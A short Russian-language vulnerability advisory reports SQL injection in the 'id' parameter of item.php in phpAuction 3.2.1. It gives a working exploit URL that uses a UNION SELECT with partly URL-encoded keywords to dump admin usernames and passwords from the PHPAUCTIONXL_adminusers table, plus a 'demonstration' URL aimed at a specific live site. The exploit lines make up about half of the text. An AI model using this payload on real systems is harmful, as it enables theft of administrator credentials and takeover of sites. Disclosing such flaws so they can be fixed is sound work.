Программа: phpAuction 3.2.1
Уязвимость позволяет удаленному пользователю выполнить произвольные SQL
команды в базе данных приложения. Уязвимость существует из-за недостаточной
обработки входных данных в параметре «id» сценарием item.php. Удаленный
пользователь может с помощью специально сформированного запроса выполнить
произвольные SQL команды в базе данных приложения.
Эксплоит:
http://www.site.net/[Pats]/item.php?id=-1+%75%6E%69%6F%6E+select+1,2,
concat_ws(0x3a,username,password),4,5,6,7,8,9,
0,11,12,13,14,15,16,17,18,19,20,21,22,23,24,25,26,27,28,29,30,
31,32+%66%72%6F%6D+PHPAUCTIONXL_adminusers--
Демонстрация:
http://www.phpauction.net/phpauction-gpl-3.2/item.php?id=-1+%75%6E%69%6F%6E+
select+1,2,concat_ws(0x3a,username,password),4,5,6,7,8,9,10,11,
12,13,14,15,16,17,18,19,20,21,22,23,24,25,26,27,28,29,30,31,
32+%66%72%6F%6D+PHPAUCTIONXL_adminusers--
